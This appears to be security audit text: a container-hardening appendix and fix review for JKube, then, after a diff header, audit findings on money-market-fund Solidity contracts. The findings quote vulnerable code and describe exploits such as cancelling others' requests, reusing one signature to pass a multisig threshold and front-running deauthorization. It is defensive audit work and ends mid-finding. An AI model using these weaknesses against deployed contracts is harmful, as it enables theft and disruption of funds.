A cgroup’s entire hierarchy will be indicated in a /sys/fs/cgroup// directory if the cgroup controllers are mounted in that directory. (Use the mount | grep cgroup command to see whether they are.) There are two versions of cgroups, cgroups v1 and cgroups v2, which can be (and often are) used at the same time.

Linux capabilities: This feature splits root privileges into "capabilities." Although this setting is primarily related to the actions a privileged user can take, there are different process capability sets, some of which are used to calculate the user’s effective capabilities (such as after running an SUID binary). Therefore, dropping all Linux capabilities from all capability sets will help prevent a process from gaining additional privileges (such as through SUID binaries). The Linux process capability sets for a given process can be read from the /proc/$PID/status file, specifically its CapInh, CapPrm, CapEff, CapBnd, and CapAmb values (which correspond to the inherited, permitted, effective, bound, and ambient capability sets, respectively). Those values can be decoded into meaningful capability names by using the capsh --decode=$VALUE tool. While the effective capability set is the one that is directly used by the kernel to execute permission checks, it is best practice to limit all other sets too, since they may allow for gaining more effective capabilities, such as through SUID binaries or programs that have “file capabilities” set.

The “no new privileges” flag: Enabling this flag for a process will prevent the user who launched the process from gaining additional privileges (such as through SUID binaries).

Seccomp BPF syscall filtering: Seccomp BPF enables the filtering of the syscalls executed by a program and the arguments passed in to them. It does this by writing a “BPF program” that is later run in the kernel. Refer to the Docker default Seccomp policy. One can write a similar profile and apply it with the --security-opt seccomp= flag.

AppArmor Linux Security Module (LSM): AppArmor is an LSM that limits a container’s access to certain resources by enforcing mandatory access control. AppArmor profiles are loaded into a kernel. A profile can be in either “complain” or “enforce” mode. In “complain” mode, violation attempts are only logged to the syslog; in “enforce” mode, such attempts are blocked. To see which profiles are loaded into a kernel, use the aa-status tool. To see whether a given process will work under the rules of an AppArmor profile, read the /proc/$PID/attr/current file. If AppArmor is not enabled for the process, the file will contain an unconfined value. If it is enabled, the file will return the name of the policy and its mode (e.g., docker-default (enforce)). Refer to the Docker AppArmor profile template and the generated form of the profile.

Additional References

● Understanding Docker Container Escapes: A Trail of Bits blog post that breaks down a container escape technique and explains the constraints required to use that technique

● Namespaces in Operation, Part 1: Namespaces Overview: A seven-part LWN article that provides an overview of Linux namespace features

● False Boundaries and Arbitrary Code Execution: An old but thorough post about Linux capabilities and the ways that they can be used in privilege escalation attempts

● Technologies for Container Isolation: A Comparison of AppArmor and SELinux: A comparison of AppArmor and SELinux

E.
Hardening Containers Run via Kubernetes

This appendix gives more context for the hardening of containers spawned by Kubernetes. Please note our definitions of the following terms:

● Container: This is the isolated “environment” created by Linux features such as namespaces, cgroups, Linux capabilities, and AppArmor and secure computing (seccomp) profiles. We are specifically concerned with Docker containers, since the tested environment uses Docker as its container engine.

● Host: This is the unconfined environment on the machine running a container (e.g., a process run in global Linux namespaces).

Root Inside Container

User namespaces allow for the remapping of user and group IDs between a host and a container; unless user namespaces are used, the root user inside the container will be the root user on the host. In a default configuration of Docker containers, the container features limit the actions that the root user can take. However, if a process does not need to be run as root, it is best to run it as another user. To run a container as another user, use the USER Dockerfile instruction. In Kubernetes, one can specify the user ID (UID) and various group IDs (GIDs) (e.g., a primary GID, a file system-related GID, and those for supplemental groups) using the runAsUser, runAsGroup, fsGroup, and supplementalGroups attributes of a securityContext field of a pod or other objects used to spawn containers.

Dropping Linux Capabilities

Linux capabilities split up the privileged actions that a root user’s process can perform. Docker drops most Linux capabilities for security purposes but leaves others enabled for convenience. We recommend dropping all Linux capabilities and then enabling only those necessary for the application to function properly. Linux capabilities can be dropped in Docker via the --cap-drop=all flag, and in Kubernetes by specifying drop: ["ALL"] under the capabilities key in the securityContext field of the deployment’s container configuration. Then, to restore necessary capabilities, use the --cap-add= flag in a docker run, or list them under the add key in capabilities in the securityContext field of the Kubernetes object manifest.

NoNewPrivs Flag

The NoNewPrivs flag prevents a process or its children from being assigned additional privileges. For example, it prevents a UID/GID from gaining capabilities or privileges by executing setuid binaries. The NoNewPrivs flag can be enabled in a docker run via the --security-opt=no-new-privileges flag. In a Kubernetes deployment, specify allowPrivilegeEscalation: false in the securityContext field to enable it.

Seccomp Policies

A seccomp policy limits the available system calls and their arguments. Normally, using seccomp requires a call to a prctl syscall with a special structure, but Docker simplifies the process and allows a seccomp policy to be specified as a JSON file. Using the default Docker profile is a good start for implementing a specific policy. Note that seccomp is disabled by default in Kubernetes. The seccomp policy can be specified with a --security-opt seccomp= flag in Docker. In Kubernetes, the seccomp policy can be set either by using a seccompProfile key in the securityContext field of a pod (in Kubernetes v1.19 or later) or by using the container.seccomp.security.alpha.kubernetes.io/: annotation (in pre-v1.19 versions). The Kubernetes documentation includes examples of both methods of setting a specific seccomp policy.
Linux Security Module (AppArmor)

An LSM is a mechanism that allows kernel developers to hook various kernel calls. AppArmor is the LSM used by default in Docker. Another popular LSM is SELinux, but since it is more difficult to set up, it is not discussed here. AppArmor limits what a process can do and which resources a process can interact with. Docker uses its default AppArmor profile, which is generated from this template. When Docker is used as a container engine in Kubernetes, the same profile is often used by default, depending on the Kubernetes cluster configuration. One can override the AppArmor profile in Kubernetes with the following annotation (which is further described here): container.apparmor.security.beta.kubernetes.io/:

F. Fix Review Results

When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not a comprehensive analysis of the system. On July 7, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the JKube team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the two issues described in this report, the JKube team has resolved one and has partially resolved the other. In addition to fixing the potential command line injection issue, the fixes include a new enricher that improves the generated configuration for Kubernetes objects, using more secure settings. JKube users must explicitly opt in to use this new enricher. For additional information, please see the Detailed Fix Review Results below.

Detailed Fix Review Results

TOB-JKUBE-1: Insecure defaults in generated artifacts
Partially resolved in PR #2177 and PR #2182. These pull requests introduce a new enricher that enforces several security best practices and recommendations for Kubernetes objects. However, this enricher is not enabled in the default configuration, which means that the generated deployment artifacts remain insecure by default unless the user enables this new feature.

TOB-JKUBE-2: Risk of command line injection from secret
Resolved in PR #2169. Among other changes, this pull request rewrote the command-line building code to use an array of arguments instead of a single command-line string. This way of invoking external programs does not present the same injection risk that was identified in the previous code with string interpolation.

G. Fix Review Status Categories

The following table describes the statuses used to indicate whether an issue has been sufficiently addressed.

Fix Status: Description

Undetermined: The status of the issue was not determined during this engagement.

Unresolved: The issue persists and has not been resolved.

Partially Resolved: The issue persists but has been partially resolved.

Resolved: The issue has been sufficiently resolved.

diff --git a/findings_newupdate/tob/2023-05-franklintempleton-moneymarket-securityreview.txt b/findings_newupdate/tob/2023-05-franklintempleton-moneymarket-securityreview.txt new file mode 100644 index 0000000..d9dcb13 --- /dev/null +++ b/findings_newupdate/tob/2023-05-franklintempleton-moneymarket-securityreview.txt @@ -0,0 +1,15 @@
+1. Canceling all transaction requests causes DoS on MMF system

Severity: High Difficulty: Low Type: Access Controls Finding ID: TOB-FTMMF-01
Target: FT/TransferAgentGateway.sol, FT/infrastructure/modules/TransactionalModule.sol

Description
Any shareholder can cancel any transaction request, which can result in a denial of service (DoS) of the MMF system. The TransactionalModule contract uses transaction requests to store buy and sell orders from users. These requests are settled at the end of the day by the admins. Admins can create or cancel a request for any user. Users can create requests for themselves and cancel their own requests. The TransferAgentGateway contract is an entry point for all user and admin actions. It implements access control checks and forwards the calls to their respective modules. The cancelRequest function in the TransferAgentGateway contract checks that the caller is the owner or a shareholder. However, if the caller is not the owner, the caller is not matched against the account argument. This allows any shareholder to call the cancelRequest function in the TransactionalModule for any account and requestId.

function cancelRequest(
    address account,
    bytes32 requestId,
    string calldata memo
) external override {
    require(
        msg.sender == owner() ||
            IAuthorization(
                moduleRegistry.getModuleAddress(AUTHORIZATION_MODULE)
            ).isAccountAuthorized(msg.sender),
        "OPERATION_NOT_ALLOWED_FOR_CALLER"
    );
    ICancellableTransaction(
        moduleRegistry.getModuleAddress(TRANSACTIONAL_MODULE)
    ).cancelRequest(account, requestId, memo);
}

Figure 1.1: The cancelRequest function in the TransferAgentGateway contract

As shown in figure 1.2, the if condition in the cancelRequest function in the TransactionalModule contract implements a check that does not allow shareholders to cancel transaction requests created by the admin. However, this check passes because the TransferAgentGateway contract is set up as the admin account in the authorization module.

function cancelRequest(
    address account,
    bytes32 requestId,
    string calldata memo
) external override onlyAdmin onlyShareholder(account) {
    require(
        transactionDetailMap[requestId].txType >
            ITransactionStorage.TransactionType.INVALID,
        "INVALID_TRANSACTION_ID"
    );
    if (!transactionDetailMap[requestId].selfService) {
        require(
            IAuthorization(modules.getModuleAddress(AUTHORIZATION_MODULE))
                .isAdminAccount(msg.sender),
            "CALLER_IS_NOT_AN_ADMIN"
        );
    }
    require(
        pendingTransactionsMap[account].remove(requestId),
        "INVALID_TRANSACTION_ID"
    );
    delete transactionDetailMap[requestId];
    accountsWithTransactions.remove(account);
    emit TransactionCancelled(account, requestId, memo);
}

Figure 1.2: The cancelRequest function in the TransactionalModule contract

Thus, a shareholder can cancel any transaction request created by anyone.

Exploit Scenario
Eve becomes an authorized shareholder and sets up a bot to listen to the TransactionSubmitted event on the TransactionalModule contract. The bot calls the cancelRequest function on the TransferAgentGateway contract for every event and cancels all the transaction requests before they are settled, thus executing a DoS attack on the MMF system.

Recommendations
Short term, add a check in the TransferAgentGateway contract to allow shareholders to cancel requests only for their own accounts (see the sketch below). Long term, document access control rules in a publicly accessible location. These rules should encompass admin, non-admin, and common functions. Ensure the code adheres to that specification by extending unit test coverage for positive and negative expectations within the system. Add fuzz tests where access control rules are the invariants under test.
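A minimal sketch of the short-term recommendation, reusing the owner() and isAccountAuthorized interfaces from figure 1.1; this is an untested illustration, not the project's implementation:

function cancelRequest(
    address account,
    bytes32 requestId,
    string calldata memo
) external override {
    // Admins may cancel any request; shareholders may cancel only their own.
    require(
        msg.sender == owner() ||
            (msg.sender == account &&
                IAuthorization(
                    moduleRegistry.getModuleAddress(AUTHORIZATION_MODULE)
                ).isAccountAuthorized(msg.sender)),
        "OPERATION_NOT_ALLOWED_FOR_CALLER"
    );
    ICancellableTransaction(
        moduleRegistry.getModuleAddress(TRANSACTIONAL_MODULE)
    ).cancelRequest(account, requestId, memo);
}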
+2. Lack of validation in the IntentValidationModule contract can lead to inconsistent state

Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-02
Target: FT/infrastructure/modules/IntentValidationModule.sol

Description
Lack of validation in the state-modifying functions of the IntentValidationModule contract can cause users to be locked out of the system. As shown in figure 2.1, the setDeviceKey function in IntentValidationModule allows adding a device ID and key to multiple accounts, which may result in the unauthorized use of a device ID.

function setDeviceKey(
    address account,
    uint256 deviceId,
    string memory key
) external override onlyAdmin {
    devicesMap[account].add(deviceId);
    deviceKeyMap[deviceId] = key;
    emit DeviceKeyAdded(account, deviceId);
}

Figure 2.1: The setDeviceKey function in the IntentValidationModule contract

Additionally, a lack of validation in the clearDeviceKey and clearAccountKeys functions can cause the key for a device ID to become zero, which may prevent users from authenticating their requests.

function clearDeviceKey(
    address account,
    uint256 deviceId
) external override onlyAdmin {
    _removeDeviceKey(account, deviceId);
}

function clearAccountKeys(address account) external override onlyAdmin {
    uint256[] memory devices = devicesMap[account].values();
    for (uint i = 0; i < devices.length; ) {
        _removeDeviceKey(account, devices[i]);
        unchecked { i++; }
    }
}

Figure 2.2: Functions to clear a device ID and key in the IntentValidationModule contract

The account-to-device-ID mapping and the device-ID-to-key mapping are used to authenticate user actions in an off-chain component, which can malfunction in the presence of these inconsistent states and lead to the authentication of malicious user actions.

Exploit Scenario
An admin adds the DEV_A device and the KEY_K key to Bob. There are then multiple ways to cause an inconsistent state, such as the following:

Adding one device to multiple accounts:
1. An admin adds the DEV_A device and the KEY_K key to Alice by mistake.
2. Alice can use Bob’s device to send unauthorized requests.

Overwriting a key for a device ID:
1. An admin adds the DEV_A device and the KEY_L key to Alice, which overwrites the key for the DEV_A device from KEY_K to KEY_L.
2. Bob cannot authenticate his requests with his KEY_K key.

Setting a key to zero for a device ID:
1. An admin adds the DEV_A device and the KEY_K key to Alice by mistake.
2. An admin removes the DEV_A device from Alice’s account. This sets the key for the DEV_A device to zero, while the device is still added to Bob’s account.
3. Bob cannot authenticate his requests with his KEY_K key.

Recommendations
Short term, make the following changes:
● Add a check in the setDeviceKey function to ensure that a device is not added to multiple accounts (see the sketch below).
● Add a new function to update the key of an already added device, with correct validation checks for the update.
Long term, document valid system states and the state transitions allowed from each state. Ensure proper data validation checks are added in all state-modifying functions with unit and fuzzing tests.
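One possible shape of the first check, sketched under the assumption that a reverse device-to-owner mapping (here called deviceOwnerMap, which does not exist in the audited code) is added:

// Hypothetical reverse mapping; not present in the audited code.
mapping(uint256 => address) private deviceOwnerMap;

function setDeviceKey(
    address account,
    uint256 deviceId,
    string memory key
) external override onlyAdmin {
    address currentOwner = deviceOwnerMap[deviceId];
    // Reject assigning a device that is already bound to another account.
    require(
        currentOwner == address(0) || currentOwner == account,
        "DEVICE_ALREADY_ASSIGNED"
    );
    deviceOwnerMap[deviceId] = account;
    devicesMap[account].add(deviceId);
    deviceKeyMap[deviceId] = key;
    emit DeviceKeyAdded(account, deviceId);
}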
+3. Pending transactions cannot be settled

Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-FTMMF-03
Target: FT/infrastructure/modules/TransactionalModule.sol, FT/infrastructure/modules/TransferAgentModule.sol, FT/MoneyMarketFund.sol

Description
An account removed from the accountsWithTransactions state variable will have its pending transactions stuck in the system, resulting in an opportunity cost loss for the users. The accountsWithTransactions state variable in the TransactionalModule contract is used to keep track of accounts with pending transactions. It is used in the following functions:

● The getAccountsWithTransactions function, to return the list of accounts with pending transactions
● The hasTransactions function, to check if an account has pending transactions

However, the cancelRequest function in the TransactionalModule contract removes the account from the accountsWithTransactions list on every cancellation. If an account has multiple pending transactions, canceling only one of the transaction requests will remove the account from the accountsWithTransactions list.

function cancelRequest(
    address account,
    bytes32 requestId,
    string calldata memo
) external override onlyAdmin onlyShareholder(account) {
    require(
        transactionDetailMap[requestId].txType >
            ITransactionStorage.TransactionType.INVALID,
        "INVALID_TRANSACTION_ID"
    );
    if (!transactionDetailMap[requestId].selfService) {
        require(
            IAuthorization(modules.getModuleAddress(AUTHORIZATION_MODULE))
                .isAdminAccount(msg.sender),
            "CALLER_IS_NOT_AN_ADMIN"
        );
    }
    require(
        pendingTransactionsMap[account].remove(requestId),
        "INVALID_TRANSACTION_ID"
    );
    delete transactionDetailMap[requestId];
    accountsWithTransactions.remove(account);
    emit TransactionCancelled(account, requestId, memo);
}

Figure 3.1: The cancelRequest function in the TransactionalModule contract

After the cancellation shown in figure 3.1, the account may still have pending transactions yet no longer appear in the accountsWithTransactions list. The off-chain components and other functionality relying on the getAccountsWithTransactions and hasTransactions functions will see these accounts as not having any pending transactions. This may result in non-settlement of the pending transactions for these accounts, leading to a loss for the users.

Exploit Scenario
Alice, a shareholder, creates multiple transaction requests and cancels the last request. For the next settlement process, the off-chain component calls the getAccountsWithTransactions function to get the list of accounts with pending transactions and settles these accounts. After the settlement run, Alice checks her balance and is surprised that her transaction requests are not settled. She loses profits from upcoming market movements.

Recommendations
Short term, have the code use the unlistFromAccountsWithPendingTransactions function in the cancelRequest function to update the accountsWithTransactions list; a sketch of the intended behavior follows below. Long term, document the system state machine specification and follow it to ensure proper data validation checks are added in all state-modifying functions.
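A minimal sketch of the intended cancellation tail, assuming pendingTransactionsMap is an OpenZeppelin EnumerableSet (so a length() view is available); the codebase's own unlistFromAccountsWithPendingTransactions helper presumably encapsulates this check:

require(
    pendingTransactionsMap[account].remove(requestId),
    "INVALID_TRANSACTION_ID"
);
delete transactionDetailMap[requestId];
// Unlist the account only once its last pending transaction is removed.
if (pendingTransactionsMap[account].length() == 0) {
    accountsWithTransactions.remove(account);
}
emit TransactionCancelled(account, requestId, memo);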
+4. Deauthorized accounts can keep shares of the MMF

Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-04
Target: FT/infrastructure/modules/AuthorizationModule.sol

Description
An unauthorized account can keep shares if the admin deauthorizes the shareholder without zeroing their balance. This can lead to legal issues because unauthorized users can keep shares of the MMF. The deauthorizeAccount function in the AuthorizationModule contract does not check that the balance of the provided account is zero before revoking the ROLE_FUND_AUTHORIZED role:

function deauthorizeAccount(
    address account
) external override onlyRole(ROLE_AUTHORIZATION_ADMIN) {
    require(account != address(0), "INVALID_ADDRESS");
    address txModule = modules.getModuleAddress(
        keccak256("MODULE_TRANSACTIONAL")
    );
    require(txModule != address(0), "MODULE_REQUIRED_NOT_FOUND");
    require(
        hasRole(ROLE_FUND_AUTHORIZED, account),
        "SHAREHOLDER_DOES_NOT_EXISTS"
    );
    require(
        !ITransactionStorage(txModule).hasTransactions(account),
        "PENDING_TRANSACTIONS_EXIST"
    );
    _revokeRole(ROLE_FUND_AUTHORIZED, account);
    emit AccountDeauthorized(account);
}

Figure 4.1: The deauthorizeAccount function in the AuthorizationModule contract

If an admin account deauthorizes a shareholder account without making the balance zero, the unauthorized account will keep the shares of the MMF. The impact is limited, however, because the unauthorized account will not be able to liquidate the shares, and the admin can adjust the balance of the account to make it zero. However, if the admin forgets to adjust the balance or is unable to do so, an unauthorized account can be left holding shares of the MMF.

Recommendations
Short term, add a check in the deauthorizeAccount function to ensure that the balance of the provided account is zero, as sketched below. Long term, document the system state machine specification and follow it to ensure proper data validation checks are added in all state-modifying functions. Add fuzz tests where the rules enforced by those validation checks are the invariants under test.
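One possible form of the check, sketched under the assumption that the fund's share balance is reachable from the module via the registry (the "MODULE_FUND" key and IERC20-style balanceOf lookup below are hypothetical names for illustration):

// Hypothetical lookup: require a zero share balance before revoking the role.
require(
    IERC20(
        modules.getModuleAddress(keccak256("MODULE_FUND"))
    ).balanceOf(account) == 0,
    "NONZERO_BALANCE"
);
_revokeRole(ROLE_FUND_AUTHORIZED, account);
emit AccountDeauthorized(account);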
+5. Solidity compiler optimizations can be problematic

Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-FTMMF-05
Target: ./hardhat.config.js

Description
The MMF has enabled optional compiler optimizations in Solidity. According to a November 2018 audit of the Solidity compiler, the optional optimizations may not be safe.

optimizer: {
    enabled: true,
    runs: 200,
},

Figure 5.1: Hardhat optimizer enabled in hardhat.config.js

Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild use them. Therefore, it is unclear how well they are being tested and exercised. Moreover, optimizations are actively being developed. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018; the fix for this bug was not reported in the Solidity changelog. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of Keccak-256 was reported. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations.

Exploit Scenario
A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the MMF contracts.

Recommendations
Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.

+6. Project dependencies contain vulnerabilities

Severity: Undetermined Difficulty: High Type: Patching Finding ID: TOB-FTMMF-06
Target: ./package.json

Description
Although dependency scans did not identify a direct threat to the project codebase, npm audit found dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the MMF system. The output detailing the identified issues is included below:

flat (<5.0.1): CVE-2020-36632, flat vulnerable to prototype pollution

@openzeppelin/contracts (3.2.0 - 4.8.2): CVE-2023-30541, OpenZeppelin contracts’ TransparentUpgradeableProxy clashing selector calls may not be delegated

@openzeppelin/contracts-upgradeable (>=3.2.0, <4.8.3): CVE-2023-30541, OpenZeppelin contracts’ TransparentUpgradeableProxy clashing selector calls may not be delegated

minimatch (<3.0.5): CVE-2022-3517, minimatch ReDoS vulnerability

request (<=2.88.2): CVE-2023-28155, Server-side request forgery in request

Table 6.1: npm audit output

Exploit Scenario
Alice installs the dependencies for this project on a clean machine. Unbeknownst to Alice, a dependency of the project has become malicious or exploitable. Alice subsequently uses the vulnerable dependency, disclosing sensitive information to an unknown actor.

Recommendations
Short term, ensure dependencies are up to date. Several node modules have been documented as malicious because they execute malicious code when installing dependencies to projects. Keep modules current and verify their integrity after installation. Long term, consider integrating automated dependency auditing into the development workflow. If dependencies cannot be updated when a vulnerability is disclosed, ensure that the project codebase does not use and is not affected by the dependency’s vulnerable functionality.

+7. Unimplemented getVersion function returns default value of zero

Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-FTMMF-07
Target: FT/infrastructure/modules/TransferAgentModule.sol

Description
The getVersion function within the TransferAgentModule contract is not implemented; at present, it yields the default uint8 value of zero.

function getVersion() external pure virtual override returns (uint8) {}

Figure 7.1: Unimplemented getVersion function in the TransferAgentModule contract

The other module contracts establish a pattern where the getVersion function is supposed to return a value of one.

function getVersion() external pure virtual override returns (uint8) {
    return 1;
}

Figure 7.2: Implemented getVersion function in the TransactionalModule contract

Exploit Scenario
Alice calls the getVersion function on the TransferAgentModule contract. It returns zero, while all the other module contracts return one. Alice misunderstands the system and which contracts are on what version of their lifecycle.

Recommendations
Short term, implement the getVersion function in the TransferAgentModule contract so it matches the specification established in the other modules. Long term, use the Slither static analyzer to catch common issues such as this one. Integrate slither-action into the project’s CI pipeline.
+8. The MultiSigGenVerifier threshold can be passed with a single signature

Severity: High Difficulty: Medium Type: Data Validation Finding ID: TOB-FTMMF-08
Target: FT/infrastructure/multisig/MultiSigGenVerifier.sol

Description
A single signature can be used multiple times to pass the threshold in the MultiSigGenVerifier contract, allowing a single signer to take full control of the system. The signedDataExecution function in the MultiSigGenVerifier contract verifies provided signatures and accumulates the acquiredThreshold value in a loop, as shown in figure 8.1:

for (uint256 i = 0; i < signaturesCount; i++) {
    (v, r, s) = _splitSignature(signatures, i);
    address signerRecovered = ecrecover(hash, v, r, s);
    if (signersSet.contains(signerRecovered)) {
        acquiredThreshold += signersMap[signerRecovered];
    }
}

Figure 8.1: The signer recovery section of the signedDataExecution function in the MultiSigGenVerifier contract

This code checks whether the recovered signer address is one of the previously added signers and adds the signer’s weight to acquiredThreshold. However, the code does not check that all the recovered signers are unique, which allows the submitter to pass the threshold with only a single signature and execute the signed transaction. The current function has an implicit zero-address check in the subsequent if statement: accounts added as signers must not be address(0). If this logic changes in the future, the impact of the ecrecover function returning address(0) (which happens when a signature is malformed) must be carefully reviewed.

Exploit Scenario
Eve, a signer, colludes with a submitter to settle their transactions at a favorable date and price. Eve signs the transaction and provides it to the submitter. The submitter uses this signature to call the signedDataExecution function, repeating the same signature multiple times in the signatures argument array to pass the threshold. Using this method, Eve can execute any admin transaction without consent from the other admins.

Recommendations
Short term, have the code verify that the signatures provided to the signedDataExecution function are unique. One way of doing this is to sort the signatures in increasing order of the signer addresses and verify this order in the loop. An example of this order verification code is shown in figure 8.2:

address lastSigner = address(0);
for (uint256 i = 0; i < signaturesCount; i++) {
    (v, r, s) = _splitSignature(signatures, i);
    address signerRecovered = ecrecover(hash, v, r, s);
    require(lastSigner < signerRecovered);
    lastSigner = signerRecovered;
    if (signersSet.contains(signerRecovered)) {
        acquiredThreshold += signersMap[signerRecovered];
    }
}

Figure 8.2: Example code to verify the uniqueness of the provided signatures

Long term, expand unit test coverage to account for common edge cases, and carefully consider all possible values for any user-provided inputs. Implement fuzz testing to explore complex scenarios and find difficult-to-detect bugs in functions with user-provided inputs.

+9. Shareholders can renounce their authorization role

Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-FTMMF-09
Target: FT/infrastructure/modules/AuthorizationModule.sol

Description
Shareholders can renounce their authorization role. As a result, system contracts that check for authorization and off-chain components may not work as expected because of an inconsistent system state. The AuthorizationModule contract extends the AccessControlUpgradeable contract from the OpenZeppelin library.
The AccessControlUpgradeable contract has a public renounceRole function, which can be called by anyone to revoke a role on their own account.

function renounceRole(bytes32 role, address account) public virtual override {
    require(account == _msgSender(), "AccessControl: can only renounce roles for self");
    _revokeRole(role, account);
}

Figure 9.1: The renounceRole function of the base contract from the OpenZeppelin library

Any shareholder can use the renounceRole function to revoke the ROLE_FUND_AUTHORIZED role on their own account without authorization from the admin. This role is used in three functions in the AuthorizationModule contract:
1. The isAccountAuthorized function, to check if an account is authorized
2. The getAuthorizedAccountsCount function, to get the number of authorized accounts
3. The getAuthorizedAccountAt function, to get the authorized account at an index

Other contracts and off-chain components relying on these functions may find the system in an inconsistent state and may not be able to work as expected.

Exploit Scenario
Eve, an authorized shareholder, renounces her ROLE_FUND_AUTHORIZED role. The off-chain components fetch the number of authorized accounts, which is one less than the expected value. The off-chain component is now operating on an inaccurate contract state.

Recommendations
Short term, have the code override the renounceRole function in the AuthorizationModule contract, and make the overridden function admin-only, as sketched below. Long term, read all the library code to find public functions exposed by the base contracts, and override them to implement correct business logic and enforce proper access controls. Document any changes between the original OpenZeppelin implementation and the MMF implementation. Be sure to thoroughly test overridden functions and changes in unit tests and fuzz tests.
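A minimal sketch of the short-term recommendation, reusing OpenZeppelin's renounceRole signature; reverting unconditionally would be an equally valid design choice:

// Untested sketch: only the authorization admin may revoke roles, so
// shareholders can no longer renounce ROLE_FUND_AUTHORIZED themselves.
function renounceRole(
    bytes32 role,
    address account
) public virtual override onlyRole(ROLE_AUTHORIZATION_ADMIN) {
    _revokeRole(role, account);
}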
+10. Risk of multiple dividend payouts in a day

Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-10
Target: FT/infrastructure/modules/TransferAgentModule.sol, FT/MoneyMarketFund.sol

Description
The fund manager can lose the system’s money by making multiple dividend payouts in a day, when dividends should be paid out only once a day. The distributeDividends function in the MoneyMarketFund contract takes the date as an argument. This date value is not validated to be later than the date from an earlier execution of the distributeDividends function.

function distributeDividends(
    address[] calldata accounts,
    uint256 date,
    int256 rate,
    uint256 price
)
    external
    onlyAdmin
    onlyWithValidRate(rate)
    onlyValidPaginationSize(accounts.length, MAX_ACCOUNT_PAGE_SIZE)
{
    lastKnownPrice = price;
    for (uint i = 0; i < accounts.length; ) {
        _processDividends(accounts[i], date, rate, price);
        unchecked { i++; }
    }
}

Figure 10.1: The distributeDividends function in the MoneyMarketFund contract

As a result, the admin can distribute dividends multiple times a day, which will result in the loss of funds from the company to the users. The admin can correct this mistake by using the adjustBalance function, but adjusting the balance for all the system users will be a difficult and costly process. The same issue also affects the following three functions:
1. The endOfDay function in the MoneyMarketFund contract
2. The distributeDividends function in the TransferAgentModule contract
3. The endOfDay function in the TransferAgentModule contract

Exploit Scenario
The admin sends a transaction to distribute dividends. The transaction is not included in the blockchain because of congestion or gas estimation errors. Forgetting about the earlier transaction, the admin sends another transaction, and both transactions are executed, distributing dividends twice on the same day.

Recommendations
Short term, have the code store the last dividend distribution date and validate that the date argument in all the dividend distribution functions is later than the last stored dividend date. Long term, document the system state machine specification and follow it to ensure proper data validation checks are added to all state-modifying functions.

+11. Shareholders can stop admin from deauthorizing them

Severity: High Type: Timing Difficulty: Medium Finding ID: TOB-FTMMF-11
Target: FT/infrastructure/modules/AuthorizationModule.sol

Description
Shareholders can prevent the admin from deauthorizing them by front-running the deauthorizeAccount function in the AuthorizationModule contract. The deauthorizeAccount function reverts if the provided account has one or more pending transactions.

function deauthorizeAccount(
    address account
) external override onlyRole(ROLE_AUTHORIZATION_ADMIN) {
    require(account != address(0), "INVALID_ADDRESS");
    address txModule = modules.getModuleAddress(
        keccak256("MODULE_TRANSACTIONAL")
    );
    require(txModule != address(0), "MODULE_REQUIRED_NOT_FOUND");
    require(
        hasRole(ROLE_FUND_AUTHORIZED, account),
        "SHAREHOLDER_DOES_NOT_EXISTS"
    );
    require(
        !ITransactionStorage(txModule).hasTransactions(account),
        "PENDING_TRANSACTIONS_EXIST"
    );
    _revokeRole(ROLE_FUND_AUTHORIZED, account);
    emit AccountDeauthorized(account);
}

Figure 11.1: The deauthorizeAccount function in the AuthorizationModule contract

A shareholder can front-run a transaction executing the deauthorizeAccount function for their account by submitting a new transaction request to buy or sell shares. The deauthorizeAccount transaction will then revert because of the pending transaction for the shareholder.

Exploit Scenario
Eve, a shareholder, sets up a bot that front-runs every deauthorizeAccount transaction targeting her account by submitting a new transaction request. As a result, all admin transactions to deauthorize Eve fail.

Recommendations
Short term, remove the check for the pending transactions of the provided account and consider one of the following:
1. Have the code cancel the pending transactions of the provided account in the deauthorizeAccount function.
2. Add a check in the _processSettlements function in the MoneyMarketFund contract to skip unauthorized accounts (see the sketch below). Add the same check in the _processSettlements function in the TransferAgentModule contract.
Long term, always analyze all contract functions that can be affected by attackers front-running calls to manipulate the system.
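A hedged sketch of option 2, assuming the AUTHORIZATION_MODULE lookup and the isAccountAuthorized view used elsewhere in the codebase; this is an illustration, not the project's implementation:

function _processSettlements(
    address account,
    uint256 date,
    uint256 price
) internal whenTransactionsExist(account) {
    // Skip accounts that were deauthorized after their requests were created.
    if (
        !IAuthorization(
            moduleRegistry.getModuleAddress(AUTHORIZATION_MODULE)
        ).isAccountAuthorized(account)
    ) {
        return;
    }
    // ... existing settlement logic follows ...
}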
+12. Total number of submitters in MultiSigGenVerifier contract can be more than the allowed limit of MAX_SUBMITTERS

Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-FTMMF-12
Target: FT/infrastructure/multisig/MultiSigGenVerifier.sol

Description
The total number of submitters in the MultiSigGenVerifier contract can be more than the allowed limit of MAX_SUBMITTERS. The addSubmitters function in the MultiSigGenVerifier contract does not check that the total number of submitters in the submittersSet stays below the value of the MAX_SUBMITTERS constant; it bounds only the length of a single call’s argument array.

function addSubmitters(address[] calldata submitters) public onlyVerifier {
    require(submitters.length <= MAX_SUBMITTERS, "INVALID_ARRAY_LENGTH");
    for (uint256 i = 0; i < submitters.length; i++) {
        submittersSet.add(submitters[i]);
    }
}

Figure 12.1: The addSubmitters function in the MultiSigGenVerifier contract

